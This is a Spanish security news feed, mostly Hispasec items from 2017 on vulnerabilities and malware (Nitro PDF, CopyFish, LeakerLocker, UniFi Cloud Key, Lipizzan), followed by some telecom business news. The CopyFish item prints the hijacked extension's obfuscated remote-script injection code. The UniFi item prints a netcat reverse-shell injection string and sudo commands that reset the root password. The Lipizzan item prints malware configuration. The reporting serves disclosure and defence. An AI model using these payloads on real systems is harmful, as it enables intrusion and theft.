You are here

Noticias

Vulnerabilidad grave en Nitro PDF Pro

Hispasec - Fri, 04/08/2017 - 18:00
Se ha reportado una vulnerabilidad en Nitro PDF Pro, una herramienta empleada para el tratamiento de archivos PDF. La vulnerabilidad es considerada de gravedad alta y podría permitir a un atacante remoto ejecutar código malicioso.
Como ya hemos comentado anteriormente, Nitro Pro es un software de edición y conversión de documentos PDF. Cuenta con soporte para dispositivos OCR y una cantidad enorme de opciones de configuración y de seguridad. Permite editar cualquier tipo de documento, incluidas imágenes, párrafos y páginas.
El problema reportado sería causado por diferentes vulnerabilidades, una de ellas, la función ‘Doc.saveAs’ podría ser usada para sobreescribir ficheros dentro del sistema, y la otra podría ser usada para saltar restricciones de seguridad en 'App.launchURL' al introducir determinados caracteres dentro de la ruta de direcciones.
El problema, con CVE-2017-7442, podría permitir a un atacante remoto valerse de las vulnerabilidades explicadas anteriormente para ejecutar código arbitrario dentro del sistema a través de ficheros especialmente manipulados, visitar páginas web maliciosas y dependiendo de la vulnerabilidad, introduciendo caracteres especiales.
Este problema afecta a Nitro PDF Reader & Nitro Reader Pro.Se recomienda actualizar a versiones superiores.https://www.gonitro.com/product/downloads#securityUpdates
Más información:
Nitro PDF
http://gonitro.com/
Prueba de concepto:https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/nitro_reader_jsapi.rb


Juan Sánchezjasanchez@hispasec.com
Categories: Seguridad

Certificados de dominio gratuitos: tu conexión con el phishing es segura

Hispasec - Thu, 03/08/2017 - 14:03
En el último post de su blog, Zscaler, una empresa de servicios de seguridad en la nube, ofrece algunas estadísticas interesantes sobre el uso de conexiones cifradas en esquemas de fraude y malware. No profundizaremos mucho en los datos, que vienen a confirmar con cifras concretas una situación que aquellos que trabajamos con phishing y malware conocemos: el constante incremento de amenazas que hacen uso de conexiones cifradas.

Aunque el artículo se centra en el malware, hay un dato que a priori puede pasar desapercibido aun siendo bastante abultado: según sus mediciones, los ataques de phishing que hacen uso de SSL/TLS han aumentado desde el pasado año. En un 400%. 12.000 peticiones al día en su plataforma.



Y esto, ¿por qué?

Este aumento no es casual. Por definición, el phishing necesita simular el sitio que suplanta, y el uso de una conexión cifrada o segura era un fleco que quedaba para satisfacer esta necesidad, más aún con la popularización del SSL/TLS. De hecho, el famoso "candadito verde" ha sido señalado durante años como indicador para diferenciar sitios legítimos y fraudulentos. El problema es que su significado no es el que se le atribuye.

Hace 9 años ya hablábamos de esto en "Mitos y leyendas: Compruebe el candadito del navegador para estar seguro". Entonces ya comentamos que los certificados de validación de dominio, aparte de la función de cifrado, simplemente aseguran que el dominio pertenece a su propietario. Esta condición no es falsa para dominios fraudulentos; sigue siendo cierto que el phisher es el propietario, y hace factible el tener un sitio “seguro” aun siendo un phishing.
Por ello se introdujeron soluciones como los certificados EV (Extended Validation) que requieren no solo pruebas de propiedad del dominio, sino además de que el propietario es la entidad que dice ser. Son aquellos que aparecen con el nombre de la empresa en color verde en el navegador.
¿Cómo ha crecido tanto?
Varios factores han propiciado el aumento de conexiones cifradas en el phishing de un tiempo a esta parte. Por un lado, iniciativas como Let's Encrypt, que permiten la obtención de un certificado de validación de dominio de manera gratuita solo demostrando control sobre el dominio. Y esto ya le ha valido alguna que otra queja. Si hace 9 años había certificados similares por 20 euros, hoy no tienen coste y el proceso de instalación es totalmente automatizado.

La posición de Let's Encrypt al respecto es clara y no ha cambiado desde hace 2 años: Los emisores de certificados no son (y no pueden ser) vigilantes de contenido:First, CAs are not well positioned to operate anti­-phishing and anti-malware operations – or to police content more generally. They simply do not have sufficient ongoing visibility into sites’ content. The best CAs can do is check with organizations that have much greater content awareness, such as Microsoft and Google. Josh Aas, Director de Let's Encrypt: https://letsencrypt.org/2015/10/29/phishing-and-malware.html



A este respecto, Let's Encrypt sí comprueba los dominios que piden certificados con Google Safe Browsing, de forma que el certificado se deniega si están marcados como malware o phishing. Sin embargo, la utilidad de esta medida no está del todo clara, ya que el certificado se pide poco después de pedir el dominio, en un momento en el que ni siquiera tiene contenido y, por tanto, no ha podido ser detectado. Como ellos mismos dicen, “el contenido cambia de manera más rápida que lo que una CA puede comprobar o certificar”.



Pero el problema puede agravarse. Plataformas de creación de sitios gratuitos, algunas auténticos nidos de fraude, ofrecen también desde hace tiempo añadir SSL de manera automática e incluso sin coste. Esta característica se ofrece a través tanto de Let's Encrypt como de la plataforma cPanel, que a finales de año comenzó a ofrecer este servicio junto a Comodo. En estos casos, el phisher no tiene más que marcar una casilla para obtener un certificado y "candadito" para su sitio fraudulento.

Y todo esto unido a los sitios comprometidos que ya cuentan con certificado y del que se aprovechan los atacantes. Aunque en este caso el phishing es más evidente al ser el dominio distinto.

Sea cual sea el caso, solo hay que darse una vuelta por Phishtank para encontrar algunos ejemplos.

¿Por qué ahora y no antes?

La popularización del cifrado en la web y el empuje de los navegadores han tenido mucho que ver. Toda web con un formulario y sin HTTPS es marcada con un rotundo “No es seguro” en algunos navegadores, lo que puede disparar las alarmas en el usuario. Lo que antes era un añadido que daba más veracidad al fraude es ahora una necesidad. Por otro lado, hasta la aparición de los certificados gratuitos no salía realmente a cuenta a los atacantes comprarlo y configurarlo, menos aún cuando los tiempos de vida de un phishing son cada vez más cortos.

¿Me fio del "candado" entonces?

Por supuesto, sin perder de vista lo que significa: que la conexión está cifrada y que el dominio pertenece al propietario, aunque este puede ser un phisher. Solo con el candado no podemos estar seguros de que el sitio web pertenece a la organización a la que realmente queremos acceder, pero sigue siendo una métrica más (junto con el nombre del dominio, el enlace que nos ha llevado allí, etc.) para discernir si el sitio es fraudulento o no.

Más información:
SSL/TLS-based malware attackshttps://www.zscaler.com/blogs/research/ssltls-based-malware-attacks
World’s Largest CA Comodo and Web Hosting Platform Leader cPanel
Join Forces to Enable Automated SSL Encryption for the Web
https://www.comodo.com/news/press_releases/2016/12/worlds-largest-CA-comodo-and-web-hosting-platform-leader-cPanel.html

Mitos y leyendas: "Compruebe el candadito del navegador para estar seguro" I (Phishing)
http://unaaldia.hispasec.com/2008/06/mitos-y-leyendas-el-candadito-del_03.html


Francisco Lópezflopez@hispasec.com@zisk0
Categories: Seguridad

CopyFish: Extensión para Google Chrome secuestrada e infectada con adware

Hispasec - Wed, 02/08/2017 - 17:23
CopyFish es un software de OCR para Google Chrome que permite extraer textos de imágenes, PDFs y vídeos. La extensión cuenta a día de hoy con 37.740 usuarios, que recibieron el pasado 29 de julio una nueva actualización que venía con una desagradable sorpresa.

Y es que la extensión había sido secuestrada. Mediante un ataque de phishing dirigido a uno de los desarrolladores, los atacantes lograron acceder a su cuenta de "Google extensions" y robar la aplicación, transfiriéndola a otra cuenta bajo su control.

El phishing mostraba un login falso a Google extensions y estaba alojado en https://chromedev.freshdesk.com

Phishing de Google Extension
Tras modificar la aplicación, publicaron la nueva versión del plugin (V2.8.5) en el repositorio de Google.

Los usuarios empezaron a reportar anuncios y spam en las webs que visitaban, lo que levantó las sospechas de los desarrolladores, que en ese punto ya habían perdido el control sobre su aplicación.

Gracias a un usuario de la comunidad de HackerNews se pudo contactar con uno de los administradores de UNPKG, un CDN para paquetes 'npm' que utilizaba la extensión maliciosa. Gracias a esto se pudo desactivar rápidamente el malware:

El pasado 1 de agosto el soporte técnico de Google devolvió la aplicación a sus legítimos desarrolladores, que actualizaron rápidamente el plugin con una versión limpia:
UPDATE August 1, 2017: This is the new, updated and SAFE version of Copyfish. For more details on what happened please see https://a9t9.com/blog/chrome-extension-adware/Además se desactivó la versión maliciosa para los usuarios que aún la tenían instalada.

Los cambios que introducía el adware cargaban código Javascript alojado en UNPKG y añadían algún código para debuggear la aplicación:

En el archivo manifest.js:

"matches": [ "<all_urls>" ] -> se sustituyó por "matches": [ "\u003Call_urls>" ]

En background.js:

console.log("Start");

chrome.runtime.onInstalled.addListener(function(details) {
    console.log("onInstalled");
    if(details.reason == "install") {
        console.log("This is a first install!");
    } else if(details.reason == "update"){
        var thisVersion = chrome.runtime.getManifest().version;
        console.log("Updated from " + details.previousVersion + " to " + thisVersion);
          chrome.storage.local.set({'installed': Date.now()});
    }
});

En cs.js, donde se carga el código malicioso:

chrome.storage.local.get('installed', function (item) {
    if (item && item.installed) {
      installed = item.installed;
      console.log('Installed:' + installed);

      if (installed) {
        console.log('Installed ms:' + (Date.now() - installed));

        if ((Date.now() - installed) > 10 * 60 * 1000) {
          console.log('Now');

          var date = new Date();
          var hour = date.getUTCHours();

          console.log(hour);

          var thisVersion = chrome.runtime.getManifest().version;

          console.log(thisVersion);
          thisVersion = thisVersion.replace('.', '-');
          thisVersion = thisVersion.replace('.', '-');
          console.log(thisVersion);

          var hash = "copyfish-npm-" + thisVersion;

          console.log(hash);

          var config_fragment = '<sc' + 'ript sr' + 'c="ht'+ 'tps://un' + 'p' + 'kg.com/' + hash + '/' + hour + '.js"></sc ' + 'ript>';

          var range = document.createRange();
          range.setStart(document.body, 0);
          document.body.appendChild(range.createContextualFragment(config_fragment));
        }
      }
    }
  });


A día de hoy la versión infectada ya está desactivada y se han tomado las medidas de seguridad oportunas. Decir que sólo afecta a Google Chrome, la versión para Firefox no ha sido comprometida.

Más información:

Extensión oficial en Googlehttps://chrome.google.com/webstore/detail/copyfish-%F0%9F%90%9F-free-ocr-soft/eenjdnjldapjajjofmldgmkjaienebbj

Comunicación oficial de los desarrolladores
https://a9t9.com/blog/chrome-extension-adware/

Conversación en HackerNews
https://news.ycombinator.com/item?id=14888010


Francisco Salidofsalido@hispasec.com
Categories: Seguridad

LeakerLocker, el malware para Android que amenaza con chivarse a tus contactos

Hispasec - Tue, 01/08/2017 - 11:47
Nacido a principios de 2016 y repuntando en los últimos días, LeakerLocker amenaza con mandar tu información personal (fotos, números, mensajes...) a todos tus contactos si no pagas un rescate. En su última campaña se ha hecho pasar por aplicaciones legítimas en Google Play.

La pantalla del resc
Bajo los nombres Wallpapers Blur HD, Booster & Cleaner Pro, y Calls Recorder, se encontraba en Google Play hasta hace poco este peculiar malware. Entre otros, amenaza con enviar a todos tus contactos tus fotos, números de teléfono, mensajes de Facebook, correos electrónicos... Si no pagas una modesta cantidad. O al menos eso es lo que dice, porque no se ha encontrado esta supuesta funcionalidad en el código de la aplicación. Aunque tampoco se puede descartar, ya que este troyano contempla la ejecución de código arbitrario descargado de los servidores del atacante.

La línea temporal de este malware no es especialmente compleja. Primero, infecta al usuario haciéndose pasar por una aplicación legítima en Google Play. Segundo, recopila la información personal e información sobre el uso del dispositivo. Finalmente, y tras varias comprobaciones que comentamos a continuación, descarga código adicional de servidores del atacante y lo ejecuta. En este código se pueden observar funciones relacionadas con la apertura, gestión e intercepción de datos de WebViews (vistas web genéricas), funcionalidades usadas entre otras cosas para suplantar la identidad de aplicaciones legítimas y capturar sus credenciales. Pero aparte de bloquear el móvil con la imagen que se muestra arriba (y no permitir su uso hasta el pago) no realiza más actividades maliciosas.

Una de las funcionalidades más interesantes de este malware es la lista de comprobaciones que realiza para permitir su propia ejecución. A priori, uno puede pensar que, una vez infectados, lo interesante es que se ejecute siempre. Pero pensándolo bien sería interesante que no se ejecutase en condiciones de laboratorio (cuando se analiza el malware) para evitar su detección intencionada por expertos. Entre otras, realiza las siguientes comprobaciones:

  • Hay más de 10 contactos y más de 10 fotos
  • Constan 3 o más registros de llamadas
  • La aplicación se ha descargado a través de Google Play

Adicionalmente, la parte principal del malware no se ejecuta hasta pasados 15 minutos desde la infección, lo que es una contramedida contra técnicas de análisis automático.
Una de las aplicaciones por las que se hace pasar este malware

Para evitar infectarse con este tipo de malware, ya en Google Play, aquí van unos cuantos consejos aplicables por el usuario de a pie:
  • No instalar aplicaciones que usen la imagen o suplanten la identidad de aplicaciones oficiales (Una aplicación con el icono de WhatsApp)
  • Comprobar que los permisos que pide la aplicación para instalarse tienen sentido (una aplicación de una linterna que pide permiso para usar el micrófono, sospechoso...)
  • Comprobar los comentarios negativos, a veces avisar que es malware o incluso que la aplicación no funciona (hay mucho malware muy mal programado...)
  • No instalar aplicaciones que prometen funcionalidad maligna (hacer trampas en un juego o "hackear" WhatsApp, si es que te mereces la infección...)

Más información sobre este malware y su comportamiento se puede encontrar buscando en Koodous las muestras con los siguientes hashes:
cb0a777e79bcef4990159e1b6577649e1fca632bfca82cb619eea0e4d7257e7b486f80edfb1dea13cde87827b14491e93c189c26830b5350e31b07c787b29387299b3a90f96b3fc1a4e3eb29be44cb325bd6750228a9342773ce973849507d12c9330f3f70e143418dbdf172f6c2473564707c5a34a5693951d2c5fc73838459d82330e1d84c2f866a0ff21093cb9669aaef2b07bf430541ab6182f98f6fdf8248e44bf56ce9c91d38d39978fd05b0cb0d31f4bdfe90376915f2d0ce1de5965814ccc15b40213a0680fc8c3a12fca4830f7930eeda95c40d1ae6098f9ac051464701a359647442d9b2d589cbba9ac7cf56949539410dbb4194d9980ec0d6b5d4


Más información:

LeakerLocker Mobile Ransomware Threatens to Expose User Information
http://blog.trendmicro.com/trendlabs-security-intelligence/leakerlocker-mobile-ransomware-threatens-expose-user-information/

LeakerLocker: Mobile Ransomware Acts Without Encryptionhttps://securingtomorrow.mcafee.com/mcafee-labs/leakerlocker-mobile-ransomware-acts-without-encryption/?awc=7545_1501598599_24d36516f8b0fefc43b9cff1c3a52551

LeakerLocker Ransomware Found in Two Apps on the Google Play Store
https://www.bleepingcomputer.com/news/security/leakerlocker-ransomware-found-in-two-apps-on-the-google-play-store/

Twitter: #leakerlocker
https://twitter.com/hashtag/leakerlocker


Carlos Ledesmacledesma@hispasec.com
Categories: Seguridad

Poniendo a prueba la seguridad de las máquinas de votación en la DefCon

Hispasec - Mon, 31/07/2017 - 13:21
El pasado fin de semana se celebró la famosa conferencia de seguridad DefCon en su 25ª edición. En esta ocasión,  el gobierno norteamericano cedió algunas máquinas de votación ya retiradas para que los investigadores disfrutaran y a la vez encontraran agujeros de seguridad para mejorar las nuevas remesas de máquinas.

Una de las máquinas cedidas fue la “ExpressPoll 5000”, que utilizaba un antiguo slot PCMCIA para transferir archivos, además de almacenar distintas bases de datos. Para empezar, hicieron un pequeño chequeo al sistema para sacar información general, como:


  • Sistema operativo Windows CE 5.0
  • El software estaba desarrollado en una aplicación usando .NET.
  • El software utilizaba WinForms en la interfaz de usuario.
  • El “bootloader” era propietario.
  • La arquitectura del procesador era ARM.
  • Contenía un fichero de base de datos en una tarjeta de memoria.


Tras probar múltiples exploits típicos para esta versión de Windows sin éxito, los investigadores se centraron en otro vector de ataque: la tarjeta de memoria.

Al arrancar el sistema con la tarjeta de memoria insertada, el bootloader comprueba un archivo llamado NK.BIN. Si está presente, lo carga en memoria RAM sin ningún tipo de comprobación de autenticidad. En ese momento se puede cambiar el firmware de manera permanente.

En este caso el archivo NK.BIN se utiliza para actualizaciones de Windows CE 5.0 en dicha máquina, pero un atacante puede subir y ejecutar cualquier Kernel NT e incluso una imagen con Linux (aunque esta última posibilidad no fue probada).



Inyección del nuevo bootloader
De manera similar a la que se cambia el firmware, también es posible cambiar el bootloader del sistema utilizando el fichero “EBOOT.BIN”. Se carga sin comprobar ninguna firma de integridad, al igual que el NK.BIN. Por desgracia esta vez la inyección no funcionó y el dispositivo quedó inservible.

Sobreescribiendo el archivo de recursos de la aplicación .NET
Cuando el software de ExpressPoll se lanza desde el botón “Lanzar” carga desde la tarjeta de memoria el archivo llamado “ExPoll.resources”. La idea de este archivo es poder definir imágenes, cadenas, botones, layouts, etc. Está pensado para personalizar la aplicación, por ejemplo sustituyendo el logotipo de Diebold.

El punto de fallo en el sistema es que los botones (y potencialmente otros elementos de la interfaz) se pueden sobreescribir para hacer otras acciones diferentes, como ejecutar un archivo almacenado en la tarjeta de memoria o ejecutar un comando en Windows CE.

La vulnerabilidad ha sido confirmada creando un archivo de recursos aleatorio de .NET, nombrándolo ExPoll.resources y copiándolo a la tarjeta de memoria. Como era de esperar, el sistema mostró un error, lo que significa que la carga del archivo funcionó. Pero al cargar un archivo corrupto se copió a memoria y dejando el sistema inservible en el proceso.

Bases de datos SQLite3
Pero sin duda una de las vulnerabilidades que más llamaron la atención es la del archivo de base de datos llamado “PollData.db3” en la tarjeta de memoria. Esta base de datos contenía toda la información de las encuestas, votantes… Usando esta información nos encontramos con varios tipos de posible ataques:


  • Filtración de información: Un atacante puede fácilmente extraer la tarjeta de memoria y reemplazarla por una que esté vacía.
  • Falsificación de información: Un atacante podría crear su propia base de datos y, reemplazando la tarjeta, cambiar los votos por unos falsos.


Datos de la base de datos. Fuente: blog.horner.tjPuertos USB abiertosEl dispositivo dispone de una serie de puertos USB donde un atacante puede introducir un dispositivo para lanzar un ataque. A partir de aquí, las posibilidades quedan abiertas a la imaginación del lector.

Servidor web por defecto en WinCEWindows CE tiene por defecto un servidor web abierto en el puerto 80 que se podría considerar como un riesgo de seguridad. Por ahora no han conseguido ningún ataque usando este vector, pero la investigación sigue abierta.

Los investigadores probaron otra serie de ataques, como desbordamientos de memoria usando “Bash Bunny” a través de los puertos USB, o introduciendo una base de datos de SQLite mayor de 1GB, sin que llegara a funcionar.


Más información:
Hacking Voting Machines at DEF CON 25
https://blog.horner.tj/post/hacking-voting-machines-def-con-25

Antonio Sánchezasanchez@hispasec.com
Categories: Seguridad

ShieldFS: un sistema de ficheros contra el ransomware

Hispasec - Sun, 30/07/2017 - 11:47
ShieldFS es un sistema de ficheros que nace fruto de la investigación de un equipo del Politécnico de Milán. Durante meses, recolectaron datos de millones de peticiones de I/O realizadas por aplicaciones legítimas en sistemas operativos limpios, y por ransomware en equipos infectados. Esto permitió ver las diferencias entre ambos y establecer modelos de comportamiento.


En general, al comparar con otros procesos, en el comportamiento típico del ransomware se realizan más lecturas, escrituras y cambios de nombre a un fichero, además de generar alta entropía en las operaciones de escritura. Hay un análisis pormenorizado de esta comparativa en la tabla 3 de su estudio.

Con estos datos en la mano, es posible reconocer el ransomware nada más comience su actividad maliciosa. Para esto, se diseñó una capa de protección y sistema de monitorización de procesos que se introdujo cono driver en el sistema de ficheros nativo de Windows. Al iniciarse un proceso desconocido, es monitorizado en sus primeros pasos en el sistema hasta que se puede discernir por su comportamiento que es seguro. En caso de detectar actividad propia del ransomware, el proceso queda bloqueado.Comparación de actividad entre procesos benignos y ransomware. Tomado de http://shieldfs.necst.it/shieldfs-acsac16.pdf
Pero la funcionalidad del sistema de ficheros va más allá de este bloqueo. Además, se incluye un sistema de respaldo que mantiene copias recientes de los ficheros. De esta manera, tras la detección del ransomware, todos los ficheros escritos por este se sustituyen por un respaldo reciente en cuestión de segundos.

Esto es especialmente útil dado que, según los investigadores, en ocasiones los rescates se pagan simplemente porque los ficheros recientes son más valiosos para los usuarios. Los sistemas de respaldo tradicionales deben llegar a un compromiso entre rendimiento, espacio y actualidad, y es complicado que tengan cambios recientes. Esta dificultad es eludida por ShieldFS al trabajar a más bajo nivel.Funcionamiento de ShieldFS. Tomado de http://shieldfs.necst.it/shieldfs-acsac16.pdf
Para las pruebas del sistema, se llevaron a cabo infecciones de tres muestras de ransomware (TeslaCrypt, Critroni y ZeroLocker) en equipos reales de usuarios voluntarios detectando y restaurando la actividad maliciosa con éxito.

Sin embargo, el sistema tiene limitaciones. Por ejemplo, un atacante podría camuflar la actividad maliciosa inyectando código en los procesos benignos del sistema y dejando que cada uno de estos haga una pequeña parte del cifrado malicioso, camuflado así su actividad.

ShieldFS fue presentado el pasado diciembre en la Annual Computer Security Applications Conference de Los Angeles y el pasado miércoles en la Black Hat en Las Vegas. Aunque de momento pertenece al mundo académico, estaremos atentos al avance del proyecto para ver si representa un avance hacia la erradicación del ransomware, una amenaza que ha atacado con especial virulencia en los últimos meses.

Más información:SHIELDFS: A Self-healing, Ransomware-aware Filesystemhttp://shieldfs.necst.it/

ShieldFS: A Self-healing, Ransomware-aware Filesystem Paper [PDF]:http://shieldfs.necst.it/continella-shieldfs-2016.pdf

Francisco Lópezflopez@hispasec.com@zisk0
Categories: Seguridad

Múltiples vulnerabilidades críticas en Ubiquiti Networks UniFi Cloud Key

Hispasec - Sat, 29/07/2017 - 18:47
Se han revelado varias vulnerabilidades críticas en los dispositivos Ubiquiti Networks UniFi Cloud Key que podrían permitir la inyección de comandos, la obtención de la contraseña del usuario y elevar privilegios.



La primera de las vulnerabilidades se encuentra en el fichero ‘api.inc’ y podría permitir una inyección de comandos a través del envío a la víctima de un enlace de actualización para el firmware de UniFi Cloud Key especialmente manipulado. Así sería posible utilizar una shell inversa para obtener acceso al dispositivo.

;busybox nc <IP-Origen> <Puerto-Origen> -e /bin/bash;
http://enlace-utilizado-para-ocultar-el-comando-en-la-ventana-de-actualizacion

En este punto se podría obtener la contraseña del usuario debido a un segundo fallo de seguridad: el fichero ‘system.cfgalmacena los nombres de usuario y hashes MD5 de las contraseñas, los cuales se podrían romper en un tiempo razonable. Y, aunque el usuario de la interfaz web ‘www-data’ tiene permisos limitados de acceso y ejecución, sí puede leer dicho archivo de configuración.

Una vez obtenida la contraseña del usuario, sería posible modificar la configuración de la red inalámbrica.

Además existe una tercera vulnerabilidad que podría permitir secuestrar al usuario ‘root’ y elevar privilegios en el dispositivo. El fallo, ubicado en el fichero ‘/etc/sudoers.d/cloudkey-webui’, consiste en que algunos binarios permiten la ejecución a través de "sudo" sin solicitar la contraseña de ‘root’. De tal forma que la contraseña del usuario "root" puede ser modificada por el usuario ‘www-data’ a pesar de tener permisos limitados a mediante el binario ‘ubnt-systool’. Ejemplo:

$ cd /tmp
$ echo "root:password" > file.txt
$ /usr/bin/sudo /sbin/ubnt-systool chpasswd < file.txt



Aunque estos errores fueron descubiertos el pasado mes de Febrero por SEC Consult, la información no ha sido revelada hasta el momento para permitir una ventana temporal suficiente tanto para que el fabricante liberase una solución como para que los usuarios pudiesen actualizar sus dispositivos.

Se ha comprobado que las versiones 0.5.9 y 0.6.0, y potencialmente versiones anteriores, de Ubiquiti Networks UniFi Cloud Key son vulnerables. Para solucionar estos problemas es necesario instalar la actualización del firmware v0.6.1 o superior.


Más información:
Ubiquiti Networks UniFi Cloud Key multiple critical vulnerabilities
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20170727-0_Ubiquiti_Networks_UniFi_Cloud_Key_Multiple_Critical_Vulnerabilities_v10.txt

UniFi Cloud Key firmware download
https://www.ubnt.com/download/unifi

Juan José Ruízjruiz@hispasec.com
Categories: Seguridad

Lipizzan: el nuevo Malware espía detectado en Google Play

Hispasec - Fri, 28/07/2017 - 11:00
Hace unos días, Google anunciaba el descubrimiento de un nuevo malware para Android. Se trata de una aplicación maliciosa cuya misión es recopilar todo tipo de información personal sobre la víctima para después transmitirla al atacante.


El malware implementa rutinas para capturar datos de las principales aplicaciones de mensajería: WhatsApp, Telegram, Messenger, Skype, GMail, etc.

Además, permite controlar de forma remota la cámara, el micrófono y acceder a los archivos del dispositivo y a su localización.

Aunque no se conoce con seguridad su procedencia, los investigadores de Android Security han encontrado en su código referencias a Equus Technologies, una empresa israelí especializada en el desarrollo de herramientas de vigilancia. De hecho, para la investigación sobre Lipizzan se han utilizado las mismas técnicas que en el estudio de otras infecciones recientes como Chrysaor, desarrollada por NSO Group.

Logo de NSO Group

Cómo infecta LipizzanEl virus se camufla como una aplicación legítima para realizar backups o para limpiar el sistema, poniendose a disposición del público en distintos markets y repositorios (incluído Google Play). La infección tiene lugar en dos etapas:
  1. Una primera etapa, en la que la víctima descarga e instala la aplicación.
  2. Una segunda, etapa en la que tras comprobar que el dispositivo es vulnerable, descarga las instrucciones necesarias para rootear el dispositivo y controlarlo.

Muestra de la segunda componente:
Media Server [Koodous]
Las últimas variantes del virus cambian el nombre de paquete, y ahora transmiten el exploit de la segunda fase de forma cifrada, lo que dificulta la detección. Además dispone de mecanismos de detección de máquinas virtuales para ocultar su verdadero comportamiento ante los ojos del analista inexperto.
A continuación uno de los ficheros de configuración que recopila alguna información interesante sobre el malware:

Extensiones de los archivos objetivo

"extensions": ["3dm", "3ds", "3fr", "3g2", "3gp", "3gpp", "3pr", "7z",
"ab4", "accdb", "accde", "accdr", "accdt", "ach", "acr", "act", "adb",
"ads", "agdl", "ai", "ait", "al", "apj", "arw", "asf", "asm", "asp", "asx",
"avi", "awg", "back", "backup", "backupdb", "bak", "bank", "bay", "bdb",
"bgt", "bik", "bkp", "blend", "bpw", "c", "cdf", "cdr", "cdr3", "cdr4",
"cdr5", "cdr6", "cdrw", "cdx", "ce1", "ce2", "cer", "cfp", "cgm", "cib",
"class", "cls", "cmt", "cpi", "cpp", "cr2", "craw", "crt", "crw", "crypt5",
"crypt6", "crypt7", "crypt8", "cs", "csh", "csl", "csv", "dac", "db", "db-journal",
"db3", "dbf", "dc2", "dcr", "dcs", "ddd", "ddoc", "ddrw", "dds", "der", "des",
"design", "dgc", "djvu", "dng", "doc", "docm", "docx", "dot", "dotm", "dotx", "drf", "drw", "dtd", "dwg", "dxb", "dxf", "dxg", "eml", "eps", "erbsql", "erf", "exf", "fdb", "ffd", "fff", "fh", "fhd", "fla", "flac", "flv", "fpx", "fxg", "gray", "grey", "gry", "h", "hbk", "hpp", "ibank", "ibd", "ibz", "idx", "iif", "iiq", "incpas", "indd", "java", "jpe", "kc2", "kdbx", "kdc", "key", "kpdx", "lua", "m", "m4v", "max", "mdb", "mdc", "mdf", "mef", "mfw", "mmw", "moneywell", "mos", "mov", "mp3", "mp4", "mpg", "mrw", "mrw", "msg", "myd", "nd", "ndd", "nef", "nk2", "nop", "nrw", "ns2", "ns3", "ns4", "nsd", "nsf", "nsg", "nsh", "nwb", "nx2", "nx1", "nyf", "oab", "obj", "odb", "odc", "odf", "odg", "odm", "odp", "ods", "odt", "oil", "orf", "ost", "otg", "oth", "otp", "ots", "ott", "p12", "p7b", "p7c", "pab", "pages", "pas", "pat", "pcd", "pct", "pdb", "pdd", "pdf", "pef", "pem", "pfx", "php", "pl", "plc", "pot", "potm", "potx", "ppam", "pps", "ppsm", "ppsx", "ppt", "pptm", "pptx", "prf", "ps", "psafe3", "psd", "pspimage", "pst", "ptx", "py", "qba", "qbb", "qbm", "qbr", "qbw", "qbx", "qby", "r3d", "raf", "rar", "rat", "raw", "rdb", "rm", "rtf", "rw2", "rw1", "rwz", "s3db", "sas7bdat", "say", "sd0", "sda", "sdf", "sldm", "sldx", "sql", "sqlite", "sqlite3", "sqlitedb", "sr2", "srf", "srt", "srw", "st4", "st5", "st6", "st7", "st8", "stc", "std", "sti", "stw", "stx", "svg", "swf", "sxc", "sxd", "sxg", "sxi", "sxm", "sxw", "tex", "tga", "thm", "tlg", "txt", "vob", "wallet", "wav", "wb2", "wmv", "wpd", "wps", "x11", "x3f", "xis", "xla", "xlam", "xlk", "xlm", "xlr", "xls", "xlsb", "xlsm", "xlsx", "xlt", "xltm", "xltx", "xlw", "ycbcra", "yuv", "zip"],
Lista negra de aplicaciones

"blacklist_apps": ["org.antivirus", "com.antivirus", "com.avast.android.mobilesecurity", "com.cleanmaster.security", "com.avira.android", "com.trustgo.mobile.security", "com.kms.free", "com.kaspersky.kes", "com.kaspersky.lightscanner", "com.cleanmaster.mguard", "com.lookout.enterprise", "com.wsandroid.suite", "com.eset.ems2.gp", "com.symantec.enterprise.mobile.security", "com.qihoo.security",
"org.malwarebytes.antimalware", "com.trendmicro.tmmssuite.mdm", "com.trendmicro.virdroid", "com.bitdefender.antivirus", "com.zimperium.zips", "com.psafe.msuite", "com.sophos.smsec", "com.drweb", "com.drweb.mcc", "com.bullguard.mobile.mobilesecurity", "com.bullguard.mobilebackup", "net.nshc.droidx3", "net.nshc.droidx3web", "com.sophos.appprotectionmonitor", "com.sophos.smsec", "com.sophos.mobilecontrol.client.android", "com.sophos.smenc", "com.comodo.cisme.antivirus", "com.quickheal.platform", "com.mobandme.security.virusguard", "de.gdata.mobilesecurity", "de.gdata.securechat", "com.webroot.security.sme", "com.webroot.secureweb", "com.ahnlab.v3mobileplus", "com.antiy.avlpro", "com.antiy.avl"],

Servidor de contacto

"api_url": "https://vps.equus-tech.com:44001",Algunas muestras de LipizzanPrimeras versiones de Lipizzan
Versiones actualizadas de Lipizzan
Las aplicaciones ya se encuentran fuera de Google Play y los pocos usuarios infectados (unos 100) ya han sido debidamente notificados.
Como siempre y como recomendación: sentido común y desconfiar de aplicaciones poco conocidas.Más información:Información oficial de los desarrolladores de Googlehttps://android-developers.googleblog.com/2017/07/from-chrysaor-to-lipizzan-blocking-new.html
Repositorio con muestras de Lipizzanhttps://github.com/fs0c1ety/Android-Malwares/tree/master/Lipizzan

Francisco Salidofsalido@hispasec.com
Categories: Seguridad

Telefonica reduce deuda y gana un 18% más gracias a América Latina

Canal PDA - Fri, 28/07/2017 - 09:55
Los resultados económicos de Telefónica durante el segundo trimestre mostraron “una aceleración generalizada del crecimiento en términos financieros y operativos”, reflejada en los incrementos de la facturación y los beneficios gracias al negocio en América Latina. La operadora española facturó casi 13.000 millones de euros, que representan un incremento del 1,9% respecto al mismo trimestre […]
Categories: PDA / PPC

Álvarez Pallete renueva la cúpula de Telefónica con Ángel Vilá como número dos

Canal PDA - Fri, 28/07/2017 - 09:51
Telefónica ha presentado resultados poco después del nombramiento del ingeniero catalán Ángel Vilá como nuevo consejero delegado. José María Álvarez Pallete, presidente ejecutivo de la operadora, culmina de este modo la renovación de la cúpula directiva con directivos de su confianza, menos vinculados a su predecesor César Alierta.Vilà ingresó en Telefónica en 1997 como controller […]
Categories: PDA / PPC

Movistar Argentina y Vivo Brasil prueban con éxito la VoLTE en roaming internacional

Canal PDA - Fri, 28/07/2017 - 09:47
Movistar Argentina y Vivo Brasil, filiales ambas de la española Telefónica, han realizado con éxito las primeras pruebas de voz sobre 4G en itinerancia internacional que se llevan a cabo con éxito en América Latina. Se trata de una experiencia piloto que todavía no tiene fecha prevista para su lanzamiento comercial, pero su importancia radica […]
Categories: PDA / PPC

De los creadores de SambaCry llega CowerSnail

